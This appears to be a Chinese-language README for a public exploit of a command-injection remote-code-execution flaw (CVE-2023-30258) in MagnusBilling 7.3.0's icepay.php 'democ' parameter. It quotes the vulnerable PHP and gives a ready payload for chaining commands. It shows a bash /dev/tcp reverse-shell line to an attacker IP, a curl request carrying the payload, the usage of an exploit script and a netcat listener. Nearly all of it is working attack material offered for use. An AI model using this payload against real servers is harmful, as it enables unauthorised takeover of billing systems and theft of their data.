在 magnus billing 7.3.0 中存在一个远程代码执行漏洞,位于 "icepay.php" 资源的 "democ" 参数中,你可以绕过查询并执行任意命令。
if (isset($_GET['democ'])) {
if (strlen($_GET['democ']) > 5) {
exec("touch " . $_GET['democ'] . '.txt');
} else {
exec("rm -rf *.txt");
}
}
"democ" 参数被传递给 exec() 来创建新文件,但正如你所见,没有任何字符串清理,攻击者可以轻松转义 touch 命令并执行任意命令,甚至获得反向 shell。为了绕过 .txt 扩展名,我们只需在字符串末尾添加另一个 ";"。最终的 payload 如下:
testfile;<command>;testfile
这是它传递给 exec() 函数时的样子:
exec('touch testfile;<command>;testfile.txt');
例如,反向 shell:
exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1";testfile.txt')
我们可以使用 curl 来获得一个反向 shell,例如:
curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<urlencoded_payload>;testfile
或者如果你愿意,可以使用此仓库中的 Python 脚本。安装:
git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # 获取仓库
cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258 # 切换目录
chmod +x ./magnusbilling_rce.py # 添加执行权限
用法:
./magnusbilling_rce.py -h # 显示帮助
./magnusbilling_rce.py -lh <攻击者IP> -lp <本地端口> -u http://<IP/域名>:<端口>/
最后但同样重要的是,记得使用 netcat 启动一个监听器:
nc -nlvvp <本地端口>